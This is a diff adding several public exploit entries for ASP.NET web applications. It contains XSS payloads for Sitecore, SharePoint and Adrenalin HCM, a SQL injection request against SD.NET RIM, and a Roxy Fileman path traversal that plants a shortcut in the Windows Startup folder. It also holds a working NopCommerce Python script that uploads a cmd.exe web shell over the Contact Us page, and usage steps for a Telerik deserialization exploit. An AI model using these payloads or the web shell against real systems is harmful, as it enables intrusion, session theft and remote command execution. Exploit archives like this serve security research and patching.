+# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore 9.0 rev 171002
+# Date: July 11, 2019
+# Exploit Author: Owais Mehtab
+# Vendor Homepage: http://www.sitecore.net/en
+# Version: 9.0 rev. 171002
+# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
+# CVE : CVE-2019-13493
+
+Vendor Description
+------------------
+Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.
+
+Description
+------------
+Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
+
+Vulnerability Class
+--------------------
+Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
+
+Proof of Concept
+----------------
+File Extension parameter is not properly escaped. This could lead to an XSS attack that could possibly affect administrators,users,editor.
+
+1. Login to application and navigate to "https://example.com/sitecore/shell/Applications/Content Editor.aspx?sw_bw=1"
+2. Go to media library and click on any image and edit it
+3. Now in Extension input parameter inject any XSS vector like '"><svg=onload=prompt(2)>
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47417.txt b/exploits/aspx/webapps/47417.txt
new file mode 100644
index 000000000..e7a6b7547
--- /dev/null
+++ b/exploits/aspx/webapps/47417.txt
@@ -0,0 +1,177 @@
+# Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting
+# Author: Davide Cioccia
+# Discovery Date: 2019-09-25
+# Vendor Homepage: https://www.microsoft.com
+# Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1
+# Tested Version: SP1
+# Tested on: Microsoft Windows Server 2016
+# CVE: CVE-2019-1262
+# Advisory ID: ZSL-2019-5533
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php
+# MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262
+
+Vendor: Microsoft Corporation
+Product web page: https://www.microsoft.com
+Affected version: 2013 SP1
+
+Summary: SharePoint is a web-based collaborative platform that
+integrates with Microsoft Office. Launched in 2001, SharePoint
+is primarily sold as a document management and storage system,
+but the product is highly configurable and usage varies substantially
+among organizations.
+
+Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft
+SharePoint Server does not properly sanitize a specially crafted web
+request to an affected SharePoint server. An authenticated attacker
+could exploit the vulnerability by sending a specially crafted request
+to an affected SharePoint server. The attacker who successfully exploited
+the vulnerability could then perform cross-site scripting attacks on
+affected systems and run script in the security context of the current
+user. The attacks could allow the attacker to read content that the
+attacker is not authorized to read, use the victim's identity to take
+actions on the SharePoint site on behalf of the user, such as change
+permissions and delete content, and inject malicious content in the
+browser of the user.
+
+Sharepoint 2013 SP1 allows users to upload files to the platform, but
+does not correctly sanitize the filename when the files are listed. An
+authenticated user that has the rights to upload files to the SharePoint
+platform, is able to exploit a Stored Cross-Site Scripting vulnerability
+in the filename. The filename is reflected in the attribute 'aria-label'
+of the following HTML tag.
+
+# PoC request:
+
+
+POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1
+Host: vulnerable_sharepoint_2013
+Connection: close
+Content-Length: 31337
+Cache-Control: max-age=0
+Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==
+Origin: https://vulnerable_sharepoint_2013.tld
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
+Sec-Fetch-Mode: nested-navigate
+Sec-Fetch-User: ?1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Sec-Fetch-Site: same-origin
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6
+Cookie: ...
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_SelectedWpId"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_View"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_ShowSettings"
+
+False
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOGallery_SelectedLibrary"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOGallery_FilterString"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_Button"
+
+none
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTTARGET"
+
+ctl00$PlaceHolderMain$ctl00$RptControls$btnOK
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTARGUMENT"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName"
+
+Browse
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOWebPartPage_Shared"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOLayout_LayoutChanges"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOLayout_InDesignMode"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName"
+
+Browse
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__REQUESTDIGEST"
+
+[DIGEST]
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+[VIEWSTATE]
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+E6912F23
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__SCROLLPOSITIONX"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__SCROLLPOSITIONY"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTVALIDATION"
+
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="destination"
+
+[DESTINATION_FOLDER]
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg"
+Content-Type: image/jpeg
+
+
+ZSL
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle"
+
+on
+------WebKitFormBoundaryewNI1MC6qaHDB50n--
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47589.txt b/exploits/aspx/webapps/47589.txt
new file mode 100644
index 000000000..5374fe1a5
--- /dev/null
+++ b/exploits/aspx/webapps/47589.txt
@@ -0,0 +1,30 @@
+# Exploit Title: SD.NET RIM 4.7.3c - 'idtyp' SQL Injection
+# Date: 2019-11-05
+# Exploit Author: Fabian Mosch (r-tec IT Security GmbH)
+# Vendor Homepage: https://www.sitzungsdienst.net/
+# Software Link: https://www.sitzungsdienst.net/2018/12/sd-net-rim-4-7-3-veroeffentlicht/
+# Version: < 4.7.3c
+# Tested on: < 4.7.3c
+# CVE : N/A
+
+# SD.NET RIM before version 4.7.3c is vulnerable to a SQL-Injection vulnerability. To Exploit the vulnerability 
+# an attacker has to inject arbitrary SQL Statements in the following POST parameters:
+
+POST /vorlagen/?__=SOMEBASE64 HTTP/1.1
+Host: VulnerableHost.com
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 182
+Origin: https://vulnerablehost.com
+Connection: close
+Referer: https://vulnerablehost.com/vorlagen/?__=BASE64
+Cookie: PHPSESSID250=SESSIONID
+Upgrade-Insecure-Requests: 1
+
+reqid=f48de4c24ae1b72dd37ebde6f6b40544&nummer=t&idtyp=-1’INJECTHERE&idgremium=-1’INJECTHERE&datefrom=TT.MM.JJJJ&dateto=TT.MM.JJJJ&csrftoken=CSRFToken
+
+# The attacker is then redirected with a 302 redirect to an URL /templates/?__=NEWBASE64 as GET request. 
+# By issuing the second request the arbitrary SQL-Statement gets executed.
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47611.txt b/exploits/aspx/webapps/47611.txt
new file mode 100644
index 000000000..3bf5efa35
--- /dev/null
+++ b/exploits/aspx/webapps/47611.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
+# Google Dork: NA
+# Date: 2018-09-06
+# Exploit Author: Rishu Ranjan (Cy83rl0gger)
+# Vendor Homepage: https://www.myadrenalin.com/
+# Software Link: https://www.myadrenalin.com/core-hcm/
+# Version: 5.4.0 (REQUIRED)
+# Tested on: NA
+# CVE : CVE-2018-12234
+# Type: webapps
+# Platform: Multiple
+
+# Description
+# ====================
+# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 of HRMS Software. 
+# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
+
+# URL
+# ====================
+
+https://<Host:port>/Adrenalin/flexiportal/GeneralInfo.aspx?strAction=Update0%22[Javascript code]22HRMS%22%29%2f%2f1
+https://<Host:port>/myadrenalin/flexiportal/GeneralInfo.aspx?strAction=Update11170%22%3balert(%22HRMS%22)%2f%2f155
+
+Parameter
+====================
+strAction
+
+Attack Type
+====================
+Remote
+
+CVE Impact Other
+====================
+Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
+
+Reference
+====================
+https://nvd.nist.gov/vuln/detail/CVE-2018-12234
+https://www.knowcybersec.com/2018/09/first-cve-2018-12234-reflected-XSS.html
+
+Discoverer
+====================
+Rishu Ranjan
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47613.txt b/exploits/aspx/webapps/47613.txt
new file mode 100644
index 000000000..643fbe525
--- /dev/null
+++ b/exploits/aspx/webapps/47613.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
+# Google Dork: NA
+# Date: 2018-09-06
+# Exploit Author: Rishu Ranjan (Cy83rl0gger)
+# Vendor Homepage: https://www.myadrenalin.com/
+# Software Link: https://www.myadrenalin.com/core-hcm/
+# Version: 5.4.0 (REQUIRED)
+# Tested on: NA
+# CVE : CVE-2018-12650
+# Type: webapps
+# Platform: Multiple
+
+# Description
+# ====================
+# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 HRMS Software. 
+# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
+
+URL
+====================
+https://<Host:port>/myadrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
+
+https://<Host:port>/Adrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
+
+Parameter
+====================
+prntDDLCntrlName
+prntFrmName
+
+Attack Type
+====================
+Remote
+
+CVE Impact Other
+====================
+Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
+
+Reference
+====================
+https://nvd.nist.gov/vuln/detail/CVE-2018-12650
+https://www.knowcybersec.com/2018/10/CVE-2018-12650-reflected-XSS.html
+
+Discoverer
+====================
+Rishu Ranjan
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47643.txt b/exploits/aspx/webapps/47643.txt
new file mode 100644
index 000000000..dbc728b90
--- /dev/null
+++ b/exploits/aspx/webapps/47643.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
+# Google Dork: NA
+# Date: 2018-09-06
+# Exploit Author: Rishu Ranjan
+# Vendor Homepage: https://www.myadrenalin.com/
+# Software Link: https://www.myadrenalin.com/core-hcm/
+# Version: 5.4.0 (REQUIRED)
+# Tested on: NA
+# CVE : CVE-2018-12653
+# Type: webapps
+# Platform: Multiple
+
+# Description
+# ====================
+# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
+# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
+# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
+# response.
+
+URL
+====================
+https://
+<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0
+
+Parameter
+====================
+ReportId
+
+Attack Type
+====================
+Remote
+
+CVE Impact Other
+====================
+Allows an attacker to input malicious JavaScript which can steal cookie,
+redirect them to other malicious website, etc.
+
+Reference
+====================
+https://nvd.nist.gov/vuln/detail/CVE-2018-12653
+https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html
+
+Discoverer
+====================
+Rishu Ranjan
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47777.txt b/exploits/aspx/webapps/47777.txt
new file mode 100644
index 000000000..13058ed13
--- /dev/null
+++ b/exploits/aspx/webapps/47777.txt
@@ -0,0 +1,125 @@
+# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
+# Author: Patrik Lantz
+# Date: 2019-12-06
+# Software: Roxy Fileman
+# Version: 1.4.5
+# Vendor Homepage: http://www.roxyfileman.com/
+# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
+# CVE: CVE-2019-19731
+
+Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 
+(using custom account as application pool identity for the IIS worker process).
+
+
+===========================
+Description
+===========================
+Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on 
+the IIS worker process privileges. 
+This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
+of this file will be triggered on the next login.
+
+
+Proof of Concept
+===========================
+
+It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
+The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
+Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
+allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include 
+the .lnk extension.
+
+1) Create a shortcut file
+
+By using for example the target executable C:\Windows\System32\Calc.exe
+Remove the .lnk extension and rename it to use the .dat extension.
+
+
+2) Upload the file 
+
+Either upload the .dat file manually via the Roxy Fileman web interface
+or programmatically using a HTTP POST request. 
+
+Details of the request:
+
+POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
+Host: 127.0.0.1:50357
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------159382831523528
+Content-Length: 924
+Origin: http://127.0.0.1:50357
+Connection: close
+Referer: http://127.0.0.1:50357/wwwroot/fileman/
+Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
+
+-----------------------------159382831523528
+Content-Disposition: form-data; name="action"
+
+upload
+-----------------------------159382831523528
+Content-Disposition: form-data; name="method"
+
+ajax
+-----------------------------159382831523528
+Content-Disposition: form-data; name="d"
+
+/wwwroot/fileman/Uploads/test2
+-----------------------------159382831523528
+Content-Disposition: form-data; name="files[]"; filename="poc.dat"
+Content-Type: application/octet-stream
+
+...data omitted...
+-----------------------------159382831523528--
+
+
+
+3) Write the file to the Startup folder using the RENAMEFILE action
+The new filename is set via the n parameter. The correct path can be identified by trial and error depending 
+on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).
+
+If the necessary directories do not exist, they can be created using the CREATEDIR action which also
+is vulnerable to path traversal.
+
+
+POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
+Host: 127.0.0.1:50357
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 66
+Origin: http://127.0.0.1:50357
+Connection: close
+Referer: http://127.0.0.1:50357/wwwroot/fileman/
+Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
+
+f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat
+
+
+
+Workaround / Fix:
+===========================
+
+Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions: 
+CREATEDIR, COPYFILE and RENAMEFILE.
+
+Recommendations for users of Roxy Fileman:
+  - Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.
+
+
+
+Timeline
+===========================
+2019-12-06: Discovered the vulnerability
+2019-12-06: Reported to the vendor (vendor is unresponsive)
+2019-12-11: Request CVE
+2019-12-13: Advisory published
+
+Discovered By:
+===========================
+Patrik Lantz
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47783.py b/exploits/aspx/webapps/47783.py
new file mode 100755
index 000000000..a914ab630
--- /dev/null
+++ b/exploits/aspx/webapps/47783.py
@@ -0,0 +1,79 @@
+# Vulnerability Title: NopCommerce 4.2.0 -  Privilege Escalation
+# Author: Alessandro Magnosi (d3adc0de)
+# Date: 2019-07-07
+# Vendor Homepage: https://www.nopcommerce.com/
+# Software Link : https://www.nopcommerce.com/
+# Tested Version: 4.2.0
+# Vulnerability Type: Privilege Escalation
+# Tested on OS: Windows 10, CentOS, Docker
+# Exploit designed for: NopCommerce 4.2.0 on IIS
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import warnings
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+def proxy(flag):
+    return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None
+
+def geturl(baseurl, type):
+    if type == "login":
+        return baseurl + "/login"
+    elif type == "mv":
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
+    elif type == "mkdir":	
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
+    elif type == "put":	
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
+    elif type == "contactus":    
+        return baseurl + "/contactus"
+    else:
+        return ""
+
+def login(email, password, url, proxy):
+    res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
+    cookie = res.cookies.get_dict()
+    soup = BeautifulSoup(res.text, features="html.parser")
+    token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
+    res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
+    cookies = res.cookies.get_dict()
+    return { **cookies, **cookie }
+
+def shellupload(email, password, url, proxy):
+    print("[+] Trying uploading shell from")	
+    cookies = login(email, password, url, proxy)
+    # Rename Common Directory
+    requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    # Create Common Directory
+    requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    # Upload File into Common
+    requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n    ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n    var result = \"\";\r\n    var cmd = Context.Request.Query[\"cmd\"];\r\n    if (!String.IsNullOrEmpty(cmd)){\r\n        result = Bash(cmd);\r\n    }\r\n\r\n    if (String.IsNullOrEmpty(result)){\r\n        result = \"Invalid command or something didn't work\";\r\n    }\r\n\r\n}\r\n\r\n@functions{\r\n    public static string Bash (string cmd)\r\n    {\r\n        var result = \"\";\r\n        var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n        var process = new Process()\r\n        {\r\n            StartInfo = new ProcessStartInfo\r\n            {\r\n                FileName = \"cmd.exe\",\r\n                Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n                RedirectStandardOutput = true,\r\n                UseShellExecute = false,\r\n                CreateNoWindow = true,\r\n            }\r\n        };\r\n\r\n        process.Start();\r\n        result = process.StandardOutput.ReadToEnd();\r\n        process.WaitForExit();\r\n\r\n        return result;\r\n    }\r\n}\r\n\r\n\r\n\r\n<script\r\n  src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n  integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n  crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n    var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t    console.log(\"should change text\");\r\n        cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n    $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n        var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n        if (results==null){\r\n           return null;\r\n        }\r\n        else{\r\n           return decodeURI(results[1]) || 0;\r\n        }\r\n    }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n        var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t    var currentCmd = $.urlParam('cmd');\r\n\t    console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t    var currentUrl = location.href;\r\n\r\n\t    var paramDelimeter = \"\";\r\n\t    if (currentUrl.indexOf(\"?\") < 0){\r\n\t        paramDelimeter = \"?\";\r\n\t    } else {\r\n\t        paramDelimeter = \"&\";\r\n\t    }\r\n        \r\n\t    if (currentUrl.indexOf(\"cmd=\") < 0){\r\n            currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t    }\r\n\t\r\n        var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n        window.location.href = newUrl;\r\n\r\n\t    //console.log(newUrl);\r\n\t}\r\n\t\r\n    $(\"#submitCommand\").click(function(){\r\n\t    executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t    if (e.which == 13) {\r\n\t        executeCmd();\r\n\t        return false;\r\n\t    }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t    var cmd = $(\"#cmd\").val();\r\n\t    $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n    <input  id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    # Test if it is working
+    res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    soup = BeautifulSoup(res.text, features="html.parser")
+    test = soup.find("span", {"id" : "cmdResult"})
+    if test is None:
+        print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
+    else:
+        print("[+] Shell uploaded under contact us page")
+
+def main():
+    parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
+    parser.add_argument(
+        '-e', '--email', required=True, type=str, help='Username')
+    parser.add_argument(
+        '-p', '--password', required=True, type=str, help='Password')
+    parser.add_argument(
+        '-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
+    parser.add_argument(
+        '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
+
+    args = parser.parse_args()
+
+    shellupload(args.email, args.password, args.url, proxy(args.proxy))
+
+if __name__ == '__main__':
+    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+    main()
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47793.txt b/exploits/aspx/webapps/47793.txt
new file mode 100644
index 000000000..dd3bf03ca
--- /dev/null
+++ b/exploits/aspx/webapps/47793.txt
@@ -0,0 +1,50 @@
+See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).
+
+Install
+git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
+python3 -m venv env
+source env/bin/activate
+pip3 install -r requirements.txt
+
+Requirements
+This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.
+
+Usage
+Compile mixed mode assembly DLL payload
+In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.
+
+build_dll.bat sleep.c
+Upload and load payload into application via insecure deserialization
+Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.
+
+python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll
